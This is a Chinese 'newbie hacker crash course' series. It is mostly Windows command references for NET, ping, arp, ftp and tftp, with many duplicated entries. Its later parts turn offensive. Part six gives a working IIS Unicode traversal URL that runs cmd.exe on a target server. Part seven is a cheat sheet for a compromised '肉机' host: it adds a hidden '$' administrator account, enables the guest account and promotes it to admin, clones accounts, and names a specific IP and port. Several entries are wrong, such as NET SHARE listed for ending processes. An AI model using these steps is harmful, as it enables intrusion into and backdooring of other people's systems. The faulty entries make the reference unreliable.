菜鸟黑客速成（一）

撒旦

菜鸟黑客速成（二）
运行命令集合
cmd.exe-----------------DOS命令提示符
regedit.exe--------------注册表
gpedit.msc---------------组策略
Msconfig.exe-------------系统配置实用程序
services.msc--------------本地服务设置
regsvr32 /u zipfldr.dll----屏蔽XP的ZIP解压功能
regsvr32 zipfldr.dll ------ 开启XP的ZIP解压功能
regsvr32 /u *.dll----------停止dll文件运行
iexplore -channelband ---收藏夹
netstat -na --------------- 查看打开的端口
chkntfs /t:0 -------------- 设置开机时磁盘检查的等待时间为0
ipconfig /all-------------- 查看本机IP及网关等
winchat--------XP自带局域网聊天
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
notepad--------打开记事本
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器
chkdsk.exe-----Chkdsk磁盘检查
drwtsn32------ 系统医生
winmsd---------系统信息
sfc /scannow---扫描错误并复原
taskmgr--------任务管理器（2000／xp／2003）
net stop messenger----停止信使服务
net start messenger---开始信使服务
oobe/msoobe /a--------检查XP是否激活
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
control userpasswords2------ 设置XP自动登录
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
sndrec32-------录音机
Nslookup-------IP地址侦测器
explorer-------打开资源管理器
logoff---------注销命令
tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组
cleanmgr-------垃圾整理
compmgmt.msc---计算机管理conf-----------启动 netmeeting
dvdplay--------DVD播放器
charmap--------启动字符映射表
diskmgmt.msc---磁盘管理实用程序
dfrg.msc-------磁盘碎片整理程序
devmgmt.msc--- 设备管理器
rononce -p ----15秒关机
rsop.msc-------组策略结果集
mem.exe--------显示内存使用情况
progman--------程序管理器
perfmon.msc----计算机性能监测程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
syncapp--------创建一个公文包
sysedit--------系统配置编辑器

撒旦

菜鸟黑客速成（三）
DOS下网络命令详解
一、Arp： 显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。

该命令只有在安装了 TCP/IP 协议之后才可使用

arp -a [inet_addr] [-N [if_addr]]

arp -d inet_addr [if_addr]

arp -s inet_addr ether_addr [if_addr]

参数

-a 通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr，则只显示指定计算机的 IP 和物理地址。

-g 与 -a 相同。

inet_addr 以加点的十进制标记指定 IP 地址。

-N 显示由 if_addr 指定的网络界面 ARP 项。

if_addr 指定需要修改其地址转换表接口的 IP 地址（如果有的话）。如果不存在，将使用第一个可适用的接口。

-d 删除由 inet_addr 指定的项。

-s 在 ARP 缓存中添加项，将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的 6 个十六进制字节给定。使用带点的十进制标记指定IP地址。项是永久性的，即在超时到期后项自动从缓存删除。

ether_addr 指定物理地址。

二、Finger 在运行 Finger 服务的指定系统上显示有关用户的信息。

根据远程系统输出不同的变量。该命令只有在安装了 TCP/IP 协议之后才可用。

finger [-l] [user]@computer[...]

参数

-l 以长列表格式显示信息。

user 指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息：

@computer

三、Ftp 将文件传送到正在运行 FTP 服务的远程计算机或从正在运行 FTP 服务的远程计算机传送文件（有时称作 daemon）。Ftp 可以交互使用。

单击“相关主题”列表中的“ftp 命令”以获得可用的“ftp”子命令描述。该命令只有在安装了 TCP/IP 协议之后才可用。Ftp 是一种服务，一旦启动，将创建在其中可以使用 ftp 命令的子环境，通过键入 quit 子命令可以从子环境返回到 Windows 2000 命令提示符。当ftp 子环境运行时，它由 ftp 命令提示符代表。

ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer]

参数

-v 禁止显示远程服务器响应。

-n 禁止自动登录到初始连接。

-i 多个文件传送时关闭交互提示。

-d 启用调试、显示在客户端和服务器之间传递的所有 ftp 命令。

-g 禁用文件名组，它允许在本地文件和路径名中使用通配符字符（* 和 ?）。（请参阅

联机“命令参考”中的 glob 命令。）

-s: filename 指定包含 ftp 命令的文本文件；当 ftp 启动后，这些命令将自动运行。该参数中不允许有空格。使用该开关而不是重定向 (>。

-a 在捆绑数据连接时使用任何本地接口。

-w:windowsize 替代默认大小为 4096 的传送缓冲区。

computer 指定要连接到远程计算机的计算机名或 IP 地址。如果指定，计算机必须是行的最

后一个参数。

四、Nbtstat 该诊断命令使用 NBT（TCP/IP 上的 NetBIOS）显示协议统计和当前 TCP/IP 连接。

该命令只有在安装了 TCP/IP 协议之后才可用。

nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

参数

-a remotename 使用远程计算机的名称列出其名称表。

-A IP address 使用远程计算机的 IP 地址并列出名称表。

-c 给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容。

-n 列出本地 NetBIOS 名称。“已注册”表明该名称已被广播 (Bnode) 或者 WINS（其他节点类型）注册。

-R 清除 NetBIOS 名称缓存中的所有名称后，重新装入 Lmhosts 文件。

-r 列出 Windows 网络名称解析的名称解析统计。在配置使用 WINS 的 Windows2000 计算机上，此选项返回要通过广播或 WINS 来解析和注册的名称数。

-S 显示客户端和服务器会话，只通过 IP 地址列出远程计算机。

-s 显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名称。

interval 重新显示选中的统计，在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计信息。如果省略该参数，nbtstat 打印一次当前的配置信息。

五、Netstat 显示协议统计和当前的 TCP/IP 网络连接。

该命令只有在安装了 TCP/IP 协议后才可以使用。

netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]

参数

-a 显示所有连接和侦听端口。服务器连接通常不显示。

-e 显示以太网统计。该参数可以与 -s 选项结合使用。

-n 以数字格式显示地址和端口号（而不是尝试查找名称）。

-s 显示每个协议的统计。默认情况下，显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。

-p protocol 显示由 protocol 指定的协议的连接；protocol 可以是 tcp 或 udp。如果与 -s选项一同使用显示每个协议的统计，protocol 可以是 tcp、udp、icmp 或ip。

-r 显示路由表的内容。

interval 重新显示所选的统计，在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数，netstat 将打印一次当前的配置信息。
六、 Ping 验证与远程计算机的连接。

该命令只有在安装了 TCP/IP 协议后才可以使用。

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list

参数

-t Ping 指定的计算机直到中断。 -a 将地址解析为计算机名。

-n count 发送 count 指定的 ECHO 数据包数。默认值为 4。

-l length 发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节；最大值是65,527。

-f 在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。

-i ttl 将“生存时间”字段设置为 ttl 指定的值。

-v tos 将“服务类型”字段设置为 tos 指定的值。

-r count 在“记录路由”字段中记录传出和返回数据包的路由。count 可以指定最少 1 台，

最多 9 台计算机。

-s count 指定 count 指定的跃点数的时间戳。

-j computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路由稀疏源）IP 允许的最大数量为 9。

-k computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路由严格源）IP 允许的最大数量为 9。

-w timeout 指定超时间隔，单位为毫秒。

destination-list 指定要 ping 的远程计算机。

七、 Rcp 在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制件。

rcp 命令是一个连接命令，从 Windows 2000 计算机发出该命令时，也可以用于其他传输在两台运行 rshd 的计算机之间复制文件。rshd 端口监控程序可以在 UNIX 计算机上使用，而在 Windows 2000 上不能使用，所以 Windows 2000 计算机仅可以作为发出命令的系统参与。远程计算机必须也通过运行 rshd 提供rcp 实用程序。

rcp [-a | -b] [-h] [-r] source1 source2 ... sourceN destination

参数

-a 指定 ASCII 传输模式。此模式在传出文件上将回车/换行符转换为回车符，在传入文件中将换行符转换为回车/换行符。该模式为默认的传输模式。 -b 指定二进制图像传输模式。没有执行回车/换行符转换。

-h 传输 Windows 2000 计算机上标记为隐藏属性的源文件。如果没有该选项，在rcp 命令行上指定隐藏文件的效果与文件不存在一样。

-r 将源的所有子目录内容递归复制到目标。source 和 destination 都必须是目录，虽然即使源不是目录，使用 -r 也能够工作。但将没有递归。

source 和 destination

格式必须为 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分，计算机将假定为本地计算机。如果省略了 [.user] 部分，将使用当前登录的 Windows 2000 用户名。如果使用了完全合格的计算机名，其中包含句点 (.) 分隔符，则必须包含 [.user]。否则，计算机名的最后部分将解释为用户名。如果指定了多个源文件，则 destination 必须是目录。

如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系统的反斜杠 () 打头，则假定相对于当前的工作目录。在 Windows 2000 中，这是发出命令的目录。在远程系统中，这是远程用户的登录目录。句点 (.) 表示当前的目录。在远程路径中使用转义字符（、" 或 '），以便在远程计算机中使用通配符。

八、 Rexec 在运行 REXEC 服务的远程计算机上运行命令。

rexec 命令在执行指定命令前，验证远程计算机上的用户名，只有安装了 TCP/IP 协议后才可以使用该命令。

rexec computer [-l username] [-n] command

参数

computer 指定要运行 command 的远程计算机。

-l username 指定远程计算机上的用户名。

-n 将 rexec 的输入重定向到 NULL。

command 指定要运行的命令。

九、 Route 控制网络路由表。

该命令只有在安装了 TCP/IP 协议后才可以使用。

route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]]

参数

-f 清除所有网关入口的路由表。如果该参数与某个命令组合使用，路由表将在运行命令前清除。

-p 该参数与 add 命令一起使用时，将使路由在系统引导程序之间持久存在。默认情况下，系统重新启动时不保留路由。与 print 命令一起使用时，显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。

command 指定下列的一个命令。

命令目的 print 打印路由

add 添加路由

delete 删除路由

change 更改现存路由

destination 指定发送 command 的计算机。 mask subnetmask 指定与该路由条目关联的子网掩码。如果没有指定，将使用 255.255.255.255。

gateway 指定网关。

名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符号名称。如果命令是 print 或 delete，目标和网关还可以使用通配符，也可以省略网关参数。

metric costmetric 指派整数跃点数（从 1 到 9999）在计算最快速、最可靠和（或）最便宜的路由时使用。

十、在运行 RSH 服务的远程计算机上运行命令。

该命令只有在安装了 TCP/IP 协议后才可以使用。

rsh computer [-l username] [-n] command

参数

computer 指定运行 command 的远程计算机。

-l username 指定远程计算机上使用的用户名。如果省略，则使用登录的用户名。

-n 将 rsh 的输入重定向到 NULL。

command 指定要运行的命令。
十一、 Tftp 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件。

该命令只有在安装了 TCP/IP 协议后才可以使用。 tftp [-i] computer [get | put] source [destination]

参数

-i 指定二进制图像传送模式（也称为“八位字节”）。在二进制图像模式中，文件一个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。

如果省略了 -i，文件将以 ASCII 模式传送。这是默认的传送模式。此模式将 EOL 字符转换为 UNIX 的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功，将显示数据传输率。

computer 指定本地或远程计算机。

put 将本地计算机上的文件 destination 传送到远程计算机上的文件 source。

get 将远程计算机上的文件 destination 传送到本地计算机上的文件 source。

如果将本地计算机上的文件 file-two 传送到远程计算机上的文件 file-one，请指定 put。如果将远程计算机上的文件 file-two 传送到远程计算机上的文件 file-one，请指定 get。因为 tftp 协议不支持用户身份验证，所以用户必须登录，并且文件在远程计算机上必须可以写入。

source 指定要传送的文件。如果本地文件指定为 -，则远程文件在 stdout 上打印出来

（如果获取），或从 stdin（如果放置）读取。

destination 指定将文件传送到的位置。如果省略了 destination，将假定与 source 同名。

十二、 Tracert 该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议(ICMP) 回显数据包发送到目标，以决定到达目标采用的路由。

要在转发数据包上的 TTL 之前至少递减 1，必需路径上的每个路由器，所以 TTL 是有效的跃点计数。数据包上的 TTL 到达 0 时，路由器应该将“ICMP 已超时”的消息发送回源系统。Tracert 先发送 TTL 为 1 的回显数据包,并在随后的每次发送过程将 TTL 递增 1，直到目标响应或 TTL 达到最大值，从而确定路由。路由通过检查中级路由器发送回的“ICMP 已超时”的消息来确定路由。不过，有些路由器悄悄地下传包含过期 TTL 值的数据包，而 tracert 看不到。

tracert [-d] [-h maximum_hops] [-j computer-list] [-w timeout] target_name

参数

/d 指定不将地址解析为计算机名。

-h maximum_hops 指定搜索目标的最大跃点数。

-j computer-list 指定沿 computer-list 的稀疏源路由。

-w timeout 每次应答等待 timeout 指定的微秒数。

撒旦

菜鸟黑客速成（四）
NET命令基本用法
(1)NET VIEW

作 用：显示域列表、计算机列表或指定计算机的共享资源列表。

命令格式：net view ［computername | /domain［:domainname］］

参数介绍：(1)键入不带参数的net view显示当前域的计算机列表。

(2)computername 指定要查看其共享资源的计算机。

(3)/domain［:domainname］指定要查看其可用计算机的域。

简单事例：(1)net view YFANG查看YFANG的共享资源列表。

(2)net view /domainOVE查看LOVE域中的机器列表。

(2)NET USER

作用：添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。

命令格式：net user ［username ［password | *］ ［options］］ ［/domain］

参数介绍：

(1)键入不带参数的net user查看计算机上的用户帐号列表。

(2)username添加、删除、更改或查看用户帐号名。

(3)password为用户帐号分配或更改密码。

(4)*提示输入密码。

(5)/domain在计算机主域的主域控制器中执行操作。

简单事例：(1)net user yfang查看用户YFANG的信息

(3)NET USE

作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

命令格式：net use ［devicename | *］ ［computernamesharename［volume］］ ［password | *］］ ［/user:［domainname］username］ ［［/delete］ | ［/persistent:{yes | no}］］

参数介绍：

键入不带参数的net use列出网络连接。

devicename指定要连接到的资源名称或要断开的设备名称。

computernamesharename服务器及共享资源的名称。

password访问共享资源的密码。

*提示键入密码。

/user指定进行连接的另外一个用户。

domainname指定另一个域。

username指定登录的用户名。

/home将用户连接到其宿主目录。

/delete取消指定网络连接。

/persistent控制永久网络连接的使用。

简单事例：

(1)net use e: YFANGTEMP将YFANGTEMP目录建立为E盘

(2)net use e: YFANGTEMP /delete断开连接

(4)NET TIME

作 用：使计算机的时钟与另一台计算机或域的时间同步。

命令格式：net time ［computername | /domain［:name］］ ［/set］

参数介绍：

(1)computername要检查或同步的服务器名。

(2)/domain［:name］指定要与其时间同步的域。

(3)/set使本计算机时钟与指定计算机或域的时钟同步。

下面的这4个参数是相关的，所以一起介绍

(5)Net Start

作 用：启动服务，或显示已启动服务的列表。

命令格式：net start service

(6)Net Pause

作 用：暂停正在运行的服务。

命令格式：net pause service

(7)Net Continue

作 用：重新激活挂起的服务。

命令格式：net continue service

(8)NET STOP

作 用：停止 Windows NT 网络服务。

命令格式：net stop service

参数介绍：我们来看看这些服务都是什么

(1)alerter(警报)

(2)client service for netware(Netware 客户端服务)

(3)clipbook server(剪贴簿服务器)

(4)computer browser(计算机浏览器)

(5)directory replicator(目录复制器)

(6)ftp publishing service (ftp )(ftp 发行服务)

(7)lpdsvc

(8)net logon(网络登录)

(9)network dde(网络 dde)

(10)network dde dsdm(网络 dde dsdm)

(11)network monitor agent(网络监控代理)

(12)nt lm security support provider(NT LM 安全性支持提供)

(13)ole(对象链接与嵌入)

(14)remote access connection manager(远程访问连接管理器)

(15)remote access isnsap service(远程访问 isnsap 服务)

(16)remote access server(远程访问服务器)

(17)remote procedure call (rpc) locator(远程过程调用定位器)

(18)remote procedure call (rpc) service(远程过程调用服务)

(19)schedule(调度)

(20)server(服务器)

(21)simple tcp/ip services(简单 TCP/IP 服务)

(22)snmp

(23)spooler(后台打印程序)

(24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)

(25)ups

(26)workstation(工作站)

(27)messenger(信使)

(28)dhcp client

(29)eventlog

以下这些SERVICE只能在NT SERVER上使用

(1)file server for macintosh

(2)gateway service for netware

(3)microsoft dhcp server

(4)print server for macintosh

(5)remoteboot

(6)windows internet name service

(9)Net Statistics

作 用：显示本地工作站或服务器服务的统计记录。

命令格式：net statistics ［workstation | server］

参数介绍：(1)键入不带参数的net

statistics列出其统计信息可用的运行服务。

(2)workstation显示本地工作站服务的统计信息。

(3)server显示本地服务器服务的统计信息。

简单事例：(1)net statistics server | more显示服务器服务的统计信息

(10)Net Share

作 用：创建、删除或显示共享资源。

命令格式：net share sharename=drive:path ［/users:number | /unlimited］ ［/remark:"text"］

参数介绍：(1)键入不带参数的net

share显示本地计算机上所有共享资源的信息。

(2)sharename是共享资源的网络名称。

(3)drive:path指定共享目录的绝对路径。

(4)/users:number设置可同时访问共享资源的最大用户数。

(5)/unlimited不限制同时访问共享资源的用户数。

(6)/remark:"text "添加关于资源的注释，注释文字用引号引住。

简单事例：(1)net share mylove=c:temp /remark:"my first

share"以mylove为共享名共享C:temp

(2)net share mylove /delete停止共享mylove目录

(11)Net Session

作 用：列出或断开本地计算机和与之连接的客户端的会话，也可以写为net sessions或net sess。

命令格式：net session ［computername］ ［/delete］

参数介绍：(1)键入不带参数的net

session显示所有与本地计算机的会话的信息。

(2)computername标识要列出或断开会话的计算机。

(3)/delete结束与computername计算机会话并关闭本次会话期间计算机的所有进程。

简单事例：(1)net session YFANG要显示计算机名为YFANG的客户端会话信息列表。

(12)Net Send

作 用：向网络的其他用户、计算机或通信名发送消息。

命令格式：net send {name | * | /domain［:name］ | /users} message

参数介绍：(1)name要接收发送消息的用户名、计算机名或通信名。

(2)*将消息发送到组中所有名称。

(3)/domain［:name］将消息发送到计算机域中的所有名称。

(4)/users将消息发送到与服务器连接的所有用户。

(5)message作为消息发送的文本。

简单事例：(1)net send /users server will shutdown in 5 minutes.给所有连接到服务器的用户发送消息

(13)Net Print

作 用：显示或控制打印作业及打印队列。

命令格式：net print ［computername ］ job# ［/hold | /release | /delete］

参数介绍：(1)computername共享打印机队列的计算机名。

(2)sharename打印队列名称。

(3)job#在打印机队列中分配给打印作业的标识号。

(4)/hold使用 job# 时，在打印机队列中使打印作业等待。

(5)/release释放保留的打印作业。

(6)/delete从打印机队列中删除打印作业。

简单事例：(1)net print YFANGSEEME列出YFANG计算机上SEEME打印机队列的目录

(14)Net Name

作 用：添加或删除消息名（有时也称别名），或显示计算机接收消息的名称列表。

命令格式：net name ［name ［/add | /delete］］

参数介绍：(1)键入不带参数的net name列出当前使用的名称。

(2)name指定接收消息的名称。

(3)/add将名称添加到计算机中。

(4)/delete从计算机中删除名称。

(15)Net Localgroup

作 用：添加、显示或更改本地组。

命令格式：net localgroup groupname {/add ［/comment:"text "］ | /delete} ［/domain］

参数介绍：(1)键入不带参数的net

localgroup显示服务器名称和计算机的本地组名称。

(2)groupname要添加、扩充或删除的本地组名称。

(3)/comment: "text "为新建或现有组添加注释。

(4)/domain在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作?

(5)name ［ ...］列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。

(6)/add将全局组名或用户名添加到本地组中。

(7)/delete从本地组中删除组名或用户名。

简单事例：(1)net localgroup love /add将名为love的本地组添加到本地用户帐号数据库

(2)net localgroup love显示love本地组中的用户

(16)Net Group

作 用：在 Windows NT Server 域中添加、显示或更改全局组。

命令格式：net group groupname {/add ［/comment:"text "］ | /delete} ［/domain］

参数介绍：(1)键入不带参数的net group显示服务器名称及服务器的组名称。

(2)groupname要添加、扩展或删除的组。

(3)/comment:"text "为新建组或现有组添加注释。

(4)/domain在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作? ?

(5)username［ ...］列表显示要添加到组或从组中删除的一个或多个用户。

(6)/add添加组或在组中添加用户名。

(7)/delete删除组或从组中删除用户名。

简单事例：(1)net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本地计算机的love组

(17)Net File

作 用：显示某服务器上所有打开的共享文件名及锁定文件数。

命令格式：net file ［id ［/close］］

参数介绍：(1)键入不带参数的net file获得服务器上打开文件的列表。

(2)id文件标识号。

(3)/close关闭打开的文件并释放锁定记录。

(18)Net Config

作 用：显示当前运行的可配置服务，或显示并更改某项服务的设置。

命令格式：net config ［service ［options］］

参数介绍：

(1)键入不带参数的net config显示可配置服务的列表。

(2)service通过net config命令进行配置的服务(server或workstation)

(3)options服务的特定选项。

(19)Net Computer

作 用：从域数据库中添加或删除计算机。

命令格式：net computer computername {/add | /del}

参数介绍：(1)computername指定要添加到域或从域中删除的计算机。

(2)/add将指定计算机添加到域。

(3)/del将指定计算机从域中删除。

简单事例：(1)net computer cc /add将计算机 cc 添加到登录域

(20)Net Accounts

作 用：更新用户帐号数据库、更改密码及所有帐号的登录要求。

命令格式：net accounts ［/forcelogoff:{minutes | no}］ ［/minpwlen:length］ ［/maxpwage:{days | unlimited}］ ［/minpwage:days］ ［/uniquepw:number］ ［/domain］

参数介绍：(1)键入不带参数的net

accounts显示当前密码设置、登录时限及域信息。

(2)/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时

(3)/minpwlen:length设置用户帐号密码的最少字符数。

(4)/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。

(5)/minpwage:days设置用户必须保持原密码的最小天数。

(6)/uniquepw:number要求用户更改密码时，必须在经过number次后才能重复使用 与之相同的密码。

(7)/domain在当前域的主域控制器上执行该操作。

(8)/sync当用于主域控制器时，该命令使域中所有备份域控制器同步

简单事例：(1)net accounts /minpwlen:7将用户帐号密码的最少字符数设置为7

----------------------上面介绍的是NET命令在WINNT下的基本用法

撒旦

菜鸟黑客速成（五）
下面我们看看NET命令在WIN98下的基本用法
在WIN98中NET命令也有一些参数

其中有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相? ?

其中有(1)NET TIME命令

(1)NET PRINT命令

(1)NET USE命令

(1)NET VIEW命令

在WIN98中NET命令有一些参数

其中有一些参数的名字和WINNT下的相应的参数的名字相同但其用法却有些不同

其中有

(1)NET START

作 用：启动相应的服务。(不能在DOS-WIN中用)

命令格式：NET START ［BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK］ ［/LIST］ ［/YES］ ［/VERBOSE］

(2)NET STOP

这篇文章综合了WINDOWS 98，WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系统关于NET命令的解释，希望可以全面一些

(1)NET命令是一个命令行命令。

(2)管理网络环境、服务、用户、登陆。。。。等本地信息

(3)WIN 98，WIN WORKSTATION和WIN NT都内置了NET命令。

(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。

(5)WORKSTATION和SERVER中的NET命令基本相同。

(6)获得HELP

(1)在NT下可以用图形的方式，开始-》帮助-》索引-》输入NET

(2)在COMMAND下可以用字符方式，NET /?或NET或NET HELP得到一些方法，相应的方法的帮助NET COMMAND /HELP或NET HELP COMMAND或NET COMMAND /? 另对于错误NET HELPMSG MESSAGE#是4位数

(7)强制参数

所有net命令接受选项/yes和/no(可缩写为/y和/n)。［简单的说就是预先给系统的提问一个答案］

(8)有一些命令是马上产生作用并永久保存的，使用的时候要慎重

(9)对于NET命令的功能都可以找到相应的图形工具的解决方案

(10)命令的组成

命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。

罗嗦说了一大堆，其实就是6和7有用，呵呵

另有两件事：

(1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的

(2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用，只能在DOS环境中使用
查看详细资料

撒旦

菜鸟黑客速成（六）
网络黑客新手入门指南
（一）系统基本知识

1.a.什么是IP:要是真的想说清楚什么是IP，那是一项很繁重的工作。简单的来说，IP就是所有Internet或是局域网上的主机的身份证。所有网络的机器连接起来后，每台机器都会有一个唯一的合法的IP地址，一台机器和别的指定的机器通讯都要依据IP来实现的。IP地址的写法为XXX.XXX.XXX.XXX。有四段数字组成，第一段数字可为1-255,后三段数字可为0-255，且所有的IP地址分为A、B、C、D、E五类，主要是A、B、C三类。其有效范围如下表所示：
类别 网络号 主机号

A 1～126 0～255 0～255 1～254
B 128～191 0～255 0～255 1～254
C 192～223 0～255 0～255 1～254
有关IP地址的问题可以查阅相关的资料，笔者在此就不再多耗笔墨了。呵呵~~~~~~~~~~~~~: p

1.b.怎样得到自己和别人的IP呢？以Windows 98为例：在“开始”—“运行”里输入：winipcfg。接着，Windows就会打开“IP 配置”。其中，在“Ethernet 适配器信息”—“IP 地址”会显示xxx.xxx.xxx.xxx,这就是你的IP。要想得到别人的IP，可以使用一些工具软件，不过最简单的使用Windows自带的一个小程序ping.exe。在MS-DOS命令行下输入ping http://www.xxx.com。会出现：
C:\>ping http://www.xxx.com

Pinging http://www.xxx.com [xxx.xxx.xxx.xxx] with 32 bytes of data:

Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=120ms TTL=116

Ping statistics for xxx.xxx.xxx.xxx:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 120ms, Maximum = 630ms, Average = 187ms

其中：xxx.xxx.xxx.xxx 就是 http://www.xxx.com的网络服务器的IP地址。

2.a.Unicode漏洞：“Unicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。下面我们来简要介绍一下它的原理。
IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含Unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。（Win NT4 编码为：%c1%9c ，Win2000 英文版 编码为：%c0%af）

假设目标主机为英文版Winodows 2k，IP为xxx.xxx.xxx.xxx，且存在Unicode漏洞，那么我们在浏览器里输入：
http://x.x.x.x/scripts/........t/system32/cmd.exe?/c+dir ，之后浏览器就会显示如下内容：
Directory of C:\inetpub\scripts
2002-02-08 15:49 〈DIR〉 .
2002-02-08 15:49 〈DIR〉 ..
2002-02-08 10:20 Index.html
2002-02-08 10:20 background.jpg
........................................
从上面的测试可以看出："http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"后就是DOS命令了："dir"
以此类推，我们可以利用浏览器远程执行任意命令，看下面的例子：
在浏览器里输入http://x.x.x.x/scripts/..%c0%af. ... md.exe?/c+dir+md+d:\Nature,运行后我们可以看到返回这样的结果：

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:

英文意思是：
CGI错误
具体的CGI申请有误，不能返回完整的HTTP标题，返回的标题为：
但是，你其实仍然在目标主机的 D:\ 里建立了一个名为:Nature的文件夹。

2.b.利用Unicode漏洞我们还可以简单的修改目标主机的WEB文件。一般情况下，我们要修改目标主机的web文件，常用到的方法是利用echo回显、管道工具“>” “>>”。如果你对这些命令不熟悉，可以键入以下命令以查看帮助文档，如：
C:\>echo/?
显示信息，或将命令响应打开或关上。
ECHO [ON | OFF]
ECHO [message]
仅键入 ECHO 而不加参数，可以显示当前的 ECHO 设置。


管道工具“>” “>>” 的不同之处
“>”“>>”是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中。
“>>”将产生的内容追加进文件中，“>”则将原文件内容覆盖。

撒旦

菜鸟黑客速成（七）
菜鸟常用命令 <给新手学习>
控制面版：运行>>>>>>>>>>>:control
计算机管理：command MMC
结束进程：NET SHARE
查看版本：ver
查看中端(服务）：net start
查看文件：dir
查看3389：
加用户：c:\winnt\system32>net user adminserver$ admin /add
提权限：net localgroup administrators adminserver$ /add
211.38.172.2 2180
查看用户net user
远程连接到主机CMD命令：telnet 主机IP
踢人：logoff ID
查看当前人：query user
打开telnet:net start telnet
telnet连接工具：OpenTelnet
删除共享： net share c$=c:\
删除共享： net share c$ /del
启用GUEST：net user guest /active:yes
为GUEST设密码：net user guest 888888
提升到管理员：net localgroup "Administrators" guest /add

超级用户隐藏器:c:\door adminserver$:admin

克隆帐号：ca \\IP 你建立的帐号 密码 肉机默认帐号 密码
ca \\127.0.0.1 adminserver$ admin adminserver admin


完全禁止系统模认工享
